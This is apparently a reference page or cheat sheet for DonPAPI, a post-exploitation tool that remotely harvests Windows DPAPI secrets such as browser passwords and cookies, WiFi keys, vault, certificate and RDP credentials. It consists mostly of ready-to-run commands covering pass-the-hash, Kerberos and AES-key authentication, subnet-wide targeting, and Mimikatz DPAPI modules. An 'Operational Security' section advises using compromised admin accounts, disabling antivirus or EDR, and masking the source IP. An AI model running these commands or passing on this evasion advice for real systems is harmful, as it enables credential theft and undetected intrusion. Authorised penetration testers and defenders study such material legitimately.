DonPAPI
DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.
Installation
Section titled “Installation”Install from PyPI:
pip install donpapiInstall from source:
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --helpRequires Python 3.8+, Impacket, and Windows domain credentials for remote access.
Quick Start
Section titled “Quick Start”Basic usage with password authentication:
donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100Single IP with domain admin account:
donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50Against multiple targets:
donpapi -d domain.com -u user -p pass 10.0.0.0/24Authentication Methods
Section titled “Authentication Methods”Password Authentication
Section titled “Password Authentication”donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100NTLM Hash (Pass-the-Hash)
Section titled “NTLM Hash (Pass-the-Hash)”donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50Kerberos Authentication
Section titled “Kerberos Authentication”donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100AES Key Authentication
Section titled “AES Key Authentication”donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100Current Session (LUID/Session Token)
Section titled “Current Session (LUID/Session Token)”donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100Target Specification
Section titled “Target Specification”Single IP Address
Section titled “Single IP Address”donpapi -d domain.com -u admin -p pass 192.168.1.100CIDR Range
Section titled “CIDR Range”donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16Targets from File
Section titled “Targets from File”donpapi -d domain.com -u admin -p pass -tf targets.txttargets.txt format (one per line):
192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50Target IP Override
Section titled “Target IP Override”donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostnameWhat It Collects
Section titled “What It Collects”Browser Credentials
Section titled “Browser Credentials”Extracts cached passwords and stored credentials from:
# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers| Browser | Passwords | Cookies | Autofill | Bookmarks |
|---|---|---|---|---|
| Chrome | Yes | Yes | Yes | No |
| Edge | Yes | Yes | Yes | No |
| Firefox | Yes | No | No | No |
| Opera | Yes | Yes | Yes | No |
| Brave | Yes | Yes | Yes | No |
WiFi Passwords
Section titled “WiFi Passwords”Recovers stored wireless network credentials:
# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryptionWindows Vault Credentials
Section titled “Windows Vault Credentials”Extracts stored credentials from Windows Credential Manager:
# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookiesCertificate Data
Section titled “Certificate Data”Harvests certificate-related secrets:
# Private keys
# Client certificates
# Server certificates
# Certificate thumbprintsRDP Connection History
Section titled “RDP Connection History”Retrieves Remote Desktop credentials:
# Saved RDP connection passwords
# Connection metadata
# Server informationScheduled Task Credentials
Section titled “Scheduled Task Credentials”Extracts credentials from scheduled tasks:
# Task-embedded usernames and passwords
# Run-as credentials
# Service account detailsCollection Methods
Section titled “Collection Methods”Registry Access Over SMB
Section titled “Registry Access Over SMB”# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extractionProtected File Retrieval
Section titled “Protected File Retrieval”# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected filesStealthy vs. Mimikatz
Section titled “Stealthy vs. Mimikatz”DonPAPI advantages over Mimikatz:
# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# No antivirus hooks on LSASS
# Recoverable from disk artifacts
# Minimal memory footprintOutput and Reporting
Section titled “Output and Reporting”Specify Output Directory
Section titled “Specify Output Directory”donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100Output Structure
Section titled “Output Structure”output/
├── 192.168.1.100/
│ ├── Browser Credentials/
│ │ ├── chrome_passwords.txt
│ │ ├── edge_passwords.txt
│ │ └── firefox_logins.json
│ ├── Wifi/
│ │ └── wifi_passwords.txt
│ ├── Windows Vault/
│ │ └── vault_credentials.txt
│ ├── Windows Certificates/
│ │ └── certificates.pem
│ ├── RDP/
│ │ └── rdp_credentials.txt
│ └── report.htmlHTML Report
Section titled “HTML Report”Automatically generated summary:
# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formatsDatabase Export
Section titled “Database Export”# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managersFiltering Options
Section titled “Filtering Options”Exclude Browser Credentials
Section titled “Exclude Browser Credentials”donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100Exclude VNC Credentials
Section titled “Exclude VNC Credentials”donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100Exclude WiFi Passwords
Section titled “Exclude WiFi Passwords”donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100Exclude Sysadmin Accounts
Section titled “Exclude Sysadmin Accounts”donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100Selective Collection
Section titled “Selective Collection”donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100Combined Filtering
Section titled “Combined Filtering”donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24DPAPI Explained
Section titled “DPAPI Explained”Windows DPAPI Overview
Section titled “Windows DPAPI Overview”DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:
# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profileDPAPI Master Keys
Section titled “DPAPI Master Keys”Location and structure:
# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon passwordDomain Backup Key Recovery
Section titled “Domain Backup Key Recovery”# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recoveryAdvanced Options
Section titled “Advanced Options”Provide Domain Backup Key
Section titled “Provide Domain Backup Key”donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100Specify Domain Controller IP
Section titled “Specify Domain Controller IP”donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100Custom Target IP
Section titled “Custom Target IP”donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01Port Specification
Section titled “Port Specification”donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24Multithreaded Collection
Section titled “Multithreaded Collection”donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24Verbose Logging
Section titled “Verbose Logging”donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100Troubleshooting
Section titled “Troubleshooting”Connection Refused
Section titled “Connection Refused”Check network connectivity and firewall:
# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachableAccess Denied
Section titled “Access Denied”Verify authentication credentials:
# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)No Credentials Found
Section titled “No Credentials Found”Target may have limited secrets stored:
# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentialsDPAPI Decryption Fails
Section titled “DPAPI Decryption Fails”Cannot decrypt without proper keys:
# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better accessSMB Enumeration Timeout
Section titled “SMB Enumeration Timeout”Increase timeout for slow networks:
donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100Best Practices
Section titled “Best Practices”Operational Security
Section titled “Operational Security”# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IPCollection Strategy
Section titled “Collection Strategy”# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safelyCredential Validation
Section titled “Credential Validation”After collection, validate credentials:
# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege levelSafe Storage
Section titled “Safe Storage”Protect harvested credentials:
# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custodyRelated Tools
Section titled “Related Tools”Mimikatz DPAPI Modules
Section titled “Mimikatz DPAPI Modules”Extract DPAPI secrets with Mimikatz:
mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI dataSharpDPAPI
Section titled “SharpDPAPI”C# DPAPI extraction tool:
# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvestingImpacket dpapi.py
Section titled “Impacket dpapi.py”Python DPAPI utilities:
# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extractionLaZagne
Section titled “LaZagne”Multi-platform credential recovery:
# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumerationOther Credential Tools
Section titled “Other Credential Tools”| Tool | Purpose | Stealth |
|---|---|---|
| Mimikatz | In-memory credential dumping | Low |
| procdump + pypykatz | Indirect LSASS dumping | Medium |
| Nirsoft tools | Cached credential recovery | Medium |
| SafetyKatz | Obfuscated Mimikatz variant | Medium |
| Credentials.ps1 | PowerShell credential module | High |